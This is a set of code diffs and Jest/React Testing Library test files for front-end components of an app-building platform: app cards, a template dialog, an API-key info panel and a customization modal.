it('should have proper elements for accessibility', () => {
const { container } = render(<AppCard {...defaultProps} />)
expect(container.querySelector('em-emoji')).toBeInTheDocument()
expect(container.querySelector('svg')).toBeInTheDocument()
})
it('should have title attribute for app name when truncated', () => {
render(<AppCard {...defaultProps} />)
const nameElement = screen.getByText('Test Chat App')
expect(nameElement).toHaveAttribute('title', 'Test Chat App')
})
it('should have accessible button with proper label', () => {
render(<AppCard {...defaultProps} />)
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ })
expect(button).toBeEnabled()
expect(button).toHaveTextContent('app.newApp.useTemplate')
})
})
describe('User-Visible Behavior Tests', () => {
it('should show plus icon in create button', () => {
render(<AppCard {...defaultProps} />)
expect(screen.getByTestId('plus-icon')).toBeInTheDocument()
})
})
})

View File

@@ -15,6 +15,7 @@ export type AppCardProps = {
const AppCard = ({
app,
canCreate,
onCreate,
}: AppCardProps) => {
const { t } = useTranslation()
@@ -45,14 +46,16 @@ const AppCard = ({
{app.description}
</div>
</div>
<div className={cn('absolute bottom-0 left-0 right-0 hidden bg-gradient-to-t from-components-panel-gradient-2 from-[60.27%] to-transparent p-4 pt-8 group-hover:flex')}>
<div className={cn('flex h-8 w-full items-center space-x-2')}>
<Button variant='primary' className='grow' onClick={() => onCreate()}>
<PlusIcon className='mr-1 h-4 w-4' />
<span className='text-xs'>{t('app.newApp.useTemplate')}</span>
</Button>
{canCreate && (
<div className={cn('absolute bottom-0 left-0 right-0 hidden bg-gradient-to-t from-components-panel-gradient-2 from-[60.27%] to-transparent p-4 pt-8 group-hover:flex')}>
<div className={cn('flex h-8 w-full items-center space-x-2')}>
<Button variant='primary' className='grow' onClick={() => onCreate()}>
<PlusIcon className='mr-1 h-4 w-4' />
<span className='text-xs'>{t('app.newApp.useTemplate')}</span>
</Button>
</div>
</div>
</div>
)}
</div>
)
}

View File

@@ -0,0 +1,287 @@
import { fireEvent, render, screen } from '@testing-library/react'
import CreateAppTemplateDialog from './index'
// Mock external dependencies (not base components)
jest.mock('./app-list', () => {
return function MockAppList({
onCreateFromBlank,
onSuccess,
}: {
onCreateFromBlank?: () => void
onSuccess: () => void
}) {
return (
<div data-testid="app-list">
<button data-testid="app-list-success" onClick={onSuccess}>
Success
</button>
{onCreateFromBlank && (
<button data-testid="create-from-blank" onClick={onCreateFromBlank}>
Create from Blank
</button>
)}
</div>
)
}
})
jest.mock('ahooks', () => ({
useKeyPress: jest.fn((_key: string, _callback: () => void) => {
// Default no-op mock; tests that need the handler override it via mockImplementation to capture the callback
return jest.fn()
}),
}))
describe('CreateAppTemplateDialog', () => {
const defaultProps = {
show: false,
onSuccess: jest.fn(),
onClose: jest.fn(),
onCreateFromBlank: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
describe('Rendering', () => {
it('should not render when show is false', () => {
render(<CreateAppTemplateDialog {...defaultProps} />)
// FullScreenModal should not render any content when open is false
expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
})
it('should render modal when show is true', () => {
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
// FullScreenModal renders with role="dialog"
expect(screen.getByRole('dialog')).toBeInTheDocument()
expect(screen.getByTestId('app-list')).toBeInTheDocument()
})
it('should render create from blank button when onCreateFromBlank is provided', () => {
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
expect(screen.getByTestId('create-from-blank')).toBeInTheDocument()
})
it('should not render create from blank button when onCreateFromBlank is not provided', () => {
const { onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps
render(<CreateAppTemplateDialog {...propsWithoutOnCreate} show={true} />)
expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument()
})
})
describe('Props', () => {
it('should pass show prop to FullScreenModal', () => {
const { rerender } = render(<CreateAppTemplateDialog {...defaultProps} />)
expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
rerender(<CreateAppTemplateDialog {...defaultProps} show={true} />)
expect(screen.getByRole('dialog')).toBeInTheDocument()
})
it('should pass closable prop to FullScreenModal', () => {
// Since the FullScreenModal is always rendered with closable=true
// we can verify that the modal renders with the proper structure
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
// Verify that the modal has the proper dialog structure
const dialog = screen.getByRole('dialog')
expect(dialog).toBeInTheDocument()
expect(dialog).toHaveAttribute('aria-modal', 'true')
})
})
describe('User Interactions', () => {
it('should handle close interactions', () => {
const mockOnClose = jest.fn()
render(<CreateAppTemplateDialog {...defaultProps} show={true} onClose={mockOnClose} />)
// Test that the modal is rendered
const dialog = screen.getByRole('dialog')
expect(dialog).toBeInTheDocument()
// Test that AppList component renders (child component interactions)
expect(screen.getByTestId('app-list')).toBeInTheDocument()
expect(screen.getByTestId('app-list-success')).toBeInTheDocument()
})
it('should call both onSuccess and onClose when app list success is triggered', () => {
const mockOnSuccess = jest.fn()
const mockOnClose = jest.fn()
render(<CreateAppTemplateDialog
{...defaultProps}
show={true}
onSuccess={mockOnSuccess}
onClose={mockOnClose}
/>)
fireEvent.click(screen.getByTestId('app-list-success'))
expect(mockOnSuccess).toHaveBeenCalledTimes(1)
expect(mockOnClose).toHaveBeenCalledTimes(1)
})
it('should call onCreateFromBlank when create from blank is clicked', () => {
const mockOnCreateFromBlank = jest.fn()
render(<CreateAppTemplateDialog
{...defaultProps}
show={true}
onCreateFromBlank={mockOnCreateFromBlank}
/>)
fireEvent.click(screen.getByTestId('create-from-blank'))
expect(mockOnCreateFromBlank).toHaveBeenCalledTimes(1)
})
})
describe('useKeyPress Integration', () => {
it('should set up ESC key listener when modal is shown', () => {
const { useKeyPress } = require('ahooks')
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
expect(useKeyPress).toHaveBeenCalledWith('esc', expect.any(Function))
})
it('should handle ESC key press to close modal', () => {
const { useKeyPress } = require('ahooks')
let capturedCallback: (() => void) | undefined
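// Capture the ESC handler the component registers so it can be invoked directly below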
useKeyPress.mockImplementation((key: string, callback: () => void) => {
if (key === 'esc')
capturedCallback = callback
return jest.fn()
})
const mockOnClose = jest.fn()
render(<CreateAppTemplateDialog
{...defaultProps}
show={true}
onClose={mockOnClose}
/>)
expect(capturedCallback).toBeDefined()
expect(typeof capturedCallback).toBe('function')
// Simulate ESC key press
capturedCallback?.()
expect(mockOnClose).toHaveBeenCalledTimes(1)
})
it('should not call onClose when ESC key is pressed and modal is not shown', () => {
const { useKeyPress } = require('ahooks')
let capturedCallback: (() => void) | undefined
useKeyPress.mockImplementation((key: string, callback: () => void) => {
if (key === 'esc')
capturedCallback = callback
return jest.fn()
})
const mockOnClose = jest.fn()
render(<CreateAppTemplateDialog
{...defaultProps}
show={false} // Modal not shown
onClose={mockOnClose}
/>)
// The callback should still be created but not execute onClose
expect(capturedCallback).toBeDefined()
// Simulate ESC key press
capturedCallback?.()
// onClose should not be called because modal is not shown
expect(mockOnClose).not.toHaveBeenCalled()
})
})
describe('Callback Dependencies', () => {
it('should create stable callback reference for ESC key handler', () => {
const { useKeyPress } = require('ahooks')
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
// Verify that useKeyPress was called with a function
const calls = useKeyPress.mock.calls
expect(calls.length).toBeGreaterThan(0)
expect(calls[0][0]).toBe('esc')
expect(typeof calls[0][1]).toBe('function')
})
})
describe('Edge Cases', () => {
it('should handle null props gracefully', () => {
expect(() => {
render(<CreateAppTemplateDialog
show={true}
onSuccess={jest.fn()}
onClose={jest.fn()}
// onCreateFromBlank is undefined
/>)
}).not.toThrow()
})
it('should handle undefined props gracefully', () => {
expect(() => {
render(<CreateAppTemplateDialog
show={true}
onSuccess={jest.fn()}
onClose={jest.fn()}
onCreateFromBlank={undefined}
/>)
}).not.toThrow()
})
it('should handle rapid show/hide toggles', () => {
// Test initial state
const { unmount } = render(<CreateAppTemplateDialog {...defaultProps} show={false} />)
unmount()
// Test show state
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
expect(screen.getByRole('dialog')).toBeInTheDocument()
// Test hide state
render(<CreateAppTemplateDialog {...defaultProps} show={false} />)
// Due to transition animations, we just verify the component handles the prop change
expect(() => render(<CreateAppTemplateDialog {...defaultProps} show={false} />)).not.toThrow()
})
it('should handle missing optional onCreateFromBlank prop', () => {
const { onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps
expect(() => {
render(<CreateAppTemplateDialog {...propsWithoutOnCreate} show={true} />)
}).not.toThrow()
expect(screen.getByTestId('app-list')).toBeInTheDocument()
expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument()
})
it('should work with all required props only', () => {
const requiredProps = {
show: true,
onSuccess: jest.fn(),
onClose: jest.fn(),
}
expect(() => {
render(<CreateAppTemplateDialog {...requiredProps} />)
}).not.toThrow()
expect(screen.getByRole('dialog')).toBeInTheDocument()
expect(screen.getByTestId('app-list')).toBeInTheDocument()
})
})
})

View File

@@ -0,0 +1,209 @@
import type { RenderOptions } from '@testing-library/react'
import { fireEvent, render } from '@testing-library/react'
import { defaultPlan } from '@/app/components/billing/config'
import { noop } from 'lodash-es'
import type { ModalContextState } from '@/context/modal-context'
import APIKeyInfoPanel from './index'
// Mock the context hooks; jest.mock calls are hoisted above the imports below
jest.mock('@/context/provider-context', () => ({
useProviderContext: jest.fn(),
}))
jest.mock('@/context/modal-context', () => ({
useModalContext: jest.fn(),
}))
import { useProviderContext as actualUseProviderContext } from '@/context/provider-context'
import { useModalContext as actualUseModalContext } from '@/context/modal-context'
// Type casting for mocks
const mockUseProviderContext = actualUseProviderContext as jest.MockedFunction<typeof actualUseProviderContext>
const mockUseModalContext = actualUseModalContext as jest.MockedFunction<typeof actualUseModalContext>
// Default mock data
const defaultProviderContext = {
modelProviders: [],
refreshModelProviders: noop,
textGenerationModelList: [],
supportRetrievalMethods: [],
isAPIKeySet: false,
plan: defaultPlan,
isFetchedPlan: false,
enableBilling: false,
onPlanInfoChanged: noop,
enableReplaceWebAppLogo: false,
modelLoadBalancingEnabled: false,
datasetOperatorEnabled: false,
enableEducationPlan: false,
isEducationWorkspace: false,
isEducationAccount: false,
allowRefreshEducationVerify: false,
educationAccountExpireAt: null,
isLoadingEducationAccountInfo: false,
isFetchingEducationAccountInfo: false,
webappCopyrightEnabled: false,
licenseLimit: {
workspace_members: {
size: 0,
limit: 0,
},
},
refreshLicenseLimit: noop,
isAllowTransferWorkspace: false,
isAllowPublishAsCustomKnowledgePipelineTemplate: false,
}
const defaultModalContext: ModalContextState = {
setShowAccountSettingModal: noop,
setShowApiBasedExtensionModal: noop,
setShowModerationSettingModal: noop,
setShowExternalDataToolModal: noop,
setShowPricingModal: noop,
setShowAnnotationFullModal: noop,
setShowModelModal: noop,
setShowExternalKnowledgeAPIModal: noop,
setShowModelLoadBalancingModal: noop,
setShowOpeningModal: noop,
setShowUpdatePluginModal: noop,
setShowEducationExpireNoticeModal: noop,
setShowTriggerEventsLimitModal: noop,
}
export type MockOverrides = {
providerContext?: Partial<typeof defaultProviderContext>
modalContext?: Partial<typeof defaultModalContext>
}
export type APIKeyInfoPanelRenderOptions = {
mockOverrides?: MockOverrides
} & Omit<RenderOptions, 'wrapper'>
// Setup function to configure mocks
export function setupMocks(overrides: MockOverrides = {}) {
mockUseProviderContext.mockReturnValue({
...defaultProviderContext,
...overrides.providerContext,
})
mockUseModalContext.mockReturnValue({
...defaultModalContext,
...overrides.modalContext,
})
}
// Custom render function
export function renderAPIKeyInfoPanel(options: APIKeyInfoPanelRenderOptions = {}) {
const { mockOverrides, ...renderOptions } = options
setupMocks(mockOverrides)
return render(<APIKeyInfoPanel />, renderOptions)
}
// Helper functions for common test scenarios
export const scenarios = {
// Render with API key not set (default)
withAPIKeyNotSet: (overrides: MockOverrides = {}) =>
renderAPIKeyInfoPanel({
mockOverrides: {
providerContext: { isAPIKeySet: false },
...overrides,
},
}),
// Render with API key already set
withAPIKeySet: (overrides: MockOverrides = {}) =>
renderAPIKeyInfoPanel({
mockOverrides: {
providerContext: { isAPIKeySet: true },
...overrides,
},
}),
// Render with mock modal function
withMockModal: (mockSetShowAccountSettingModal: jest.Mock, overrides: MockOverrides = {}) =>
renderAPIKeyInfoPanel({
mockOverrides: {
modalContext: { setShowAccountSettingModal: mockSetShowAccountSettingModal },
...overrides,
},
}),
}
// Common test assertions
export const assertions = {
// Should render main button
shouldRenderMainButton: () => {
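// Document-level query by the primary button's CSS class, independent of the render container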
const button = document.querySelector('button.btn-primary')
expect(button).toBeInTheDocument()
return button
},
// Should not render at all
shouldNotRender: (container: HTMLElement) => {
expect(container.firstChild).toBeNull()
},
// Should have correct panel styling
shouldHavePanelStyling: (panel: HTMLElement) => {
expect(panel).toHaveClass(
'border-components-panel-border',
'bg-components-panel-bg',
'relative',
'mb-6',
'rounded-2xl',
'border',
'p-8',
'shadow-md',
)
},
// Should have close button
shouldHaveCloseButton: (container: HTMLElement) => {
const closeButton = container.querySelector('.absolute.right-4.top-4')
expect(closeButton).toBeInTheDocument()
expect(closeButton).toHaveClass('cursor-pointer')
return closeButton
},
}
// Common user interactions
export const interactions = {
// Click the main button
clickMainButton: () => {
const button = document.querySelector('button.btn-primary')
if (button) fireEvent.click(button)
return button
},
// Click the close button
clickCloseButton: (container: HTMLElement) => {
const closeButton = container.querySelector('.absolute.right-4.top-4')
if (closeButton) fireEvent.click(closeButton)
return closeButton
},
}
// Text content keys for assertions
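// The shared i18n mock renders raw translation keys, so these regexes match the keys directly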
export const textKeys = {
selfHost: {
titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/,
titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/,
setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/,
tryCloud: /appOverview\.apiKeyInfo\.tryCloud/,
},
cloud: {
trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/,
trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/,
setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/,
},
}
// Setup and cleanup utilities
export function clearAllMocks() {
jest.clearAllMocks()
}
// Export mock functions for external access
export { mockUseProviderContext, mockUseModalContext, defaultModalContext }

View File

@@ -0,0 +1,122 @@
import { cleanup, screen } from '@testing-library/react'
import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants'
import {
assertions,
clearAllMocks,
defaultModalContext,
interactions,
mockUseModalContext,
scenarios,
textKeys,
} from './apikey-info-panel.test-utils'
// Mock config for Cloud edition
jest.mock('@/config', () => ({
IS_CE_EDITION: false, // Test Cloud edition
}))
afterEach(cleanup)
describe('APIKeyInfoPanel - Cloud Edition', () => {
const mockSetShowAccountSettingModal = jest.fn()
beforeEach(() => {
clearAllMocks()
mockUseModalContext.mockReturnValue({
...defaultModalContext,
setShowAccountSettingModal: mockSetShowAccountSettingModal,
})
})
describe('Rendering', () => {
it('should render without crashing when API key is not set', () => {
scenarios.withAPIKeyNotSet()
assertions.shouldRenderMainButton()
})
it('should not render when API key is already set', () => {
const { container } = scenarios.withAPIKeySet()
assertions.shouldNotRender(container)
})
it('should not render when panel is hidden by user', () => {
const { container } = scenarios.withAPIKeyNotSet()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Cloud Edition Content', () => {
it('should display cloud version title', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.cloud.trialTitle)).toBeInTheDocument()
})
it('should display emoji for cloud version', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.querySelector('em-emoji')).toBeInTheDocument()
expect(container.querySelector('em-emoji')).toHaveAttribute('id', '😀')
})
it('should display cloud version description', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.cloud.trialDescription)).toBeInTheDocument()
})
it('should not render external link for cloud version', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.querySelector('a[href="https://cloud.dify.ai/apps"]')).not.toBeInTheDocument()
})
it('should display set API button text', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.cloud.setAPIBtn)).toBeInTheDocument()
})
})
describe('User Interactions', () => {
it('should call setShowAccountSettingModal when set API button is clicked', () => {
scenarios.withMockModal(mockSetShowAccountSettingModal)
interactions.clickMainButton()
expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({
payload: ACCOUNT_SETTING_TAB.PROVIDER,
})
})
it('should hide panel when close button is clicked', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.firstChild).toBeInTheDocument()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Props and Styling', () => {
it('should render button with primary variant', () => {
scenarios.withAPIKeyNotSet()
const button = screen.getByRole('button')
expect(button).toHaveClass('btn-primary')
})
it('should render panel container with correct classes', () => {
const { container } = scenarios.withAPIKeyNotSet()
const panel = container.firstChild as HTMLElement
assertions.shouldHavePanelStyling(panel)
})
})
describe('Accessibility', () => {
it('should have button with proper role', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByRole('button')).toBeInTheDocument()
})
it('should have clickable close button', () => {
const { container } = scenarios.withAPIKeyNotSet()
assertions.shouldHaveCloseButton(container)
})
})
})

View File

@@ -0,0 +1,162 @@
import { cleanup, screen } from '@testing-library/react'
import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants'
import {
assertions,
clearAllMocks,
defaultModalContext,
interactions,
mockUseModalContext,
scenarios,
textKeys,
} from './apikey-info-panel.test-utils'
// Mock config for CE edition
jest.mock('@/config', () => ({
IS_CE_EDITION: true, // Exercise the Community Edition branch
}))
afterEach(cleanup)
describe('APIKeyInfoPanel - Community Edition', () => {
const mockSetShowAccountSettingModal = jest.fn()
beforeEach(() => {
clearAllMocks()
mockUseModalContext.mockReturnValue({
...defaultModalContext,
setShowAccountSettingModal: mockSetShowAccountSettingModal,
})
})
describe('Rendering', () => {
it('should render without crashing when API key is not set', () => {
scenarios.withAPIKeyNotSet()
assertions.shouldRenderMainButton()
})
it('should not render when API key is already set', () => {
const { container } = scenarios.withAPIKeySet()
assertions.shouldNotRender(container)
})
it('should not render when panel is hidden by user', () => {
const { container } = scenarios.withAPIKeyNotSet()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Content Display', () => {
it('should display self-host title content', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.selfHost.titleRow1)).toBeInTheDocument()
expect(screen.getByText(textKeys.selfHost.titleRow2)).toBeInTheDocument()
})
it('should display set API button text', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.selfHost.setAPIBtn)).toBeInTheDocument()
})
it('should render external link with correct href for self-host version', () => {
const { container } = scenarios.withAPIKeyNotSet()
const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]')
expect(link).toBeInTheDocument()
expect(link).toHaveAttribute('target', '_blank')
expect(link).toHaveAttribute('rel', 'noopener noreferrer')
expect(link).toHaveTextContent(textKeys.selfHost.tryCloud)
})
it('should have external link with proper styling for self-host version', () => {
const { container } = scenarios.withAPIKeyNotSet()
const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]')
expect(link).toHaveClass(
'mt-2',
'flex',
'h-[26px]',
'items-center',
'space-x-1',
'p-1',
'text-xs',
'font-medium',
'text-[#155EEF]',
)
})
})
describe('User Interactions', () => {
it('should call setShowAccountSettingModal when set API button is clicked', () => {
scenarios.withMockModal(mockSetShowAccountSettingModal)
interactions.clickMainButton()
expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({
payload: ACCOUNT_SETTING_TAB.PROVIDER,
})
})
it('should hide panel when close button is clicked', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.firstChild).toBeInTheDocument()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Props and Styling', () => {
it('should render button with primary variant', () => {
scenarios.withAPIKeyNotSet()
const button = screen.getByRole('button')
expect(button).toHaveClass('btn-primary')
})
it('should render panel container with correct classes', () => {
const { container } = scenarios.withAPIKeyNotSet()
const panel = container.firstChild as HTMLElement
assertions.shouldHavePanelStyling(panel)
})
})
describe('State Management', () => {
it('should start with visible panel (isShow: true)', () => {
scenarios.withAPIKeyNotSet()
assertions.shouldRenderMainButton()
})
it('should toggle visibility when close button is clicked', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.firstChild).toBeInTheDocument()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Edge Cases', () => {
it('should handle provider context loading state', () => {
scenarios.withAPIKeyNotSet({
providerContext: {
modelProviders: [],
textGenerationModelList: [],
},
})
assertions.shouldRenderMainButton()
})
})
describe('Accessibility', () => {
it('should have button with proper role', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByRole('button')).toBeInTheDocument()
})
it('should have clickable close button', () => {
const { container } = scenarios.withAPIKeyNotSet()
assertions.shouldHaveCloseButton(container)
})
})
})

View File

@@ -401,7 +401,6 @@ function AppCard({
/>
<CustomizeModal
isShow={showCustomizeModal}
linkUrl=""
onClose={() => setShowCustomizeModal(false)}
appId={appInfo.id}
api_base_url={appInfo.api_base_url}

View File

@@ -0,0 +1,434 @@
import { fireEvent, render, screen, waitFor } from '@testing-library/react'
import CustomizeModal from './index'
import { AppModeEnum } from '@/types/app'
// Mock useDocLink from context
const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`)
jest.mock('@/context/i18n', () => ({
useDocLink: () => mockDocLink,
}))
// Mock window.open
const mockWindowOpen = jest.fn()
Object.defineProperty(window, 'open', {
value: mockWindowOpen,
writable: true,
})
describe('CustomizeModal', () => {
const defaultProps = {
isShow: true,
onClose: jest.fn(),
api_base_url: 'https://api.example.com',
appId: 'test-app-id-123',
mode: AppModeEnum.CHAT,
}
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering tests - verify component renders correctly with various configurations
describe('Rendering', () => {
it('should render without crashing when isShow is true', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument()
      })
    })
    it('should not render content when isShow is false', async () => {
      // Arrange
      const props = { ...defaultProps, isShow: false }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument()
      })
    })
    it('should render modal description', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument()
      })
    })
    it('should render way 1 and way 2 tags', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument()
        expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument()
      })
    })
    it('should render all step numbers (1, 2, 3)', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        expect(screen.getByText('1')).toBeInTheDocument()
        expect(screen.getByText('2')).toBeInTheDocument()
        expect(screen.getByText('3')).toBeInTheDocument()
      })
    })
    it('should render step instructions', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument()
        expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument()
        expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument()
      })
    })
    it('should render environment variables with appId and api_base_url', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre')
        expect(preElement).toBeInTheDocument()
        expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'')
        expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'')
      })
    })
    it('should render GitHub icon in step 1 button', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert - find the GitHub link and verify it contains an SVG icon
      await waitFor(() => {
        const githubLink = screen.getByRole('link', { name: /step1Operation/i })
        expect(githubLink).toBeInTheDocument()
        expect(githubLink.querySelector('svg')).toBeInTheDocument()
      })
    })
  })
  // Props tests - verify props are correctly applied
  describe('Props', () => {
    it('should display correct appId in environment variables', async () => {
      // Arrange
      const customAppId = 'custom-app-id-456'
      const props = { ...defaultProps, appId: customAppId }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre')
        expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`)
      })
    })
    it('should display correct api_base_url in environment variables', async () => {
      // Arrange
      const customApiUrl = 'https://custom-api.example.com'
      const props = { ...defaultProps, api_base_url: customApiUrl }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre')
        expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`)
      })
    })
  })
  // Mode-based conditional rendering tests - verify GitHub link changes based on app mode
  describe('Mode-based GitHub link', () => {
    it('should link to webapp-conversation repo for CHAT mode', async () => {
      // Arrange
      const props = { ...defaultProps, mode: AppModeEnum.CHAT }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const githubLink = screen.getByRole('link', { name: /step1Operation/i })
        expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation')
      })
    })
    it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => {
      // Arrange
      const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const githubLink = screen.getByRole('link', { name: /step1Operation/i })
        expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation')
      })
    })
    it('should link to webapp-text-generator repo for COMPLETION mode', async () => {
      // Arrange
      const props = { ...defaultProps, mode: AppModeEnum.COMPLETION }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const githubLink = screen.getByRole('link', { name: /step1Operation/i })
        expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator')
      })
    })
    it('should link to webapp-text-generator repo for WORKFLOW mode', async () => {
      // Arrange
      const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const githubLink = screen.getByRole('link', { name: /step1Operation/i })
        expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator')
      })
    })
    it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => {
      // Arrange
      const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const githubLink = screen.getByRole('link', { name: /step1Operation/i })
        expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator')
      })
    })
  })
  // External links tests - verify external links have correct security attributes
  describe('External links', () => {
    it('should have GitHub repo link that opens in new tab', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const githubLink = screen.getByRole('link', { name: /step1Operation/i })
        expect(githubLink).toHaveAttribute('target', '_blank')
        expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer')
      })
    })
    it('should have Vercel docs link that opens in new tab', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const vercelLink = screen.getByRole('link', { name: /step2Operation/i })
        expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github')
        expect(vercelLink).toHaveAttribute('target', '_blank')
        expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer')
      })
    })
  })
  // User interactions tests - verify user actions trigger expected behaviors
  describe('User Interactions', () => {
    it('should call window.open with doc link when way 2 button is clicked', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      await waitFor(() => {
        expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument()
      })
      const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button')
      expect(way2Button).toBeInTheDocument()
      fireEvent.click(way2Button!)
      // Assert
      expect(mockWindowOpen).toHaveBeenCalledTimes(1)
      expect(mockWindowOpen).toHaveBeenCalledWith(
        expect.stringContaining('/guides/application-publishing/developing-with-apis'),
        '_blank',
      )
    })
    it('should call onClose when modal close button is clicked', async () => {
      // Arrange
      const onClose = jest.fn()
      const props = { ...defaultProps, onClose }
      // Act
      render(<CustomizeModal {...props} />)
      // Wait for modal to be fully rendered
      await waitFor(() => {
        expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument()
      })
      // Find the close button by navigating from the heading to the close icon
      // The close icon is an SVG inside a sibling div of the title
      const heading = screen.getByRole('heading', { name: /customize\.title/i })
      const closeIcon = heading.parentElement!.querySelector('svg')
      // Assert - closeIcon must exist for the test to be valid
      expect(closeIcon).toBeInTheDocument()
      fireEvent.click(closeIcon!)
      expect(onClose).toHaveBeenCalledTimes(1)
    })
  })
  // Edge cases tests - verify component handles boundary conditions
  describe('Edge Cases', () => {
    it('should handle empty appId', async () => {
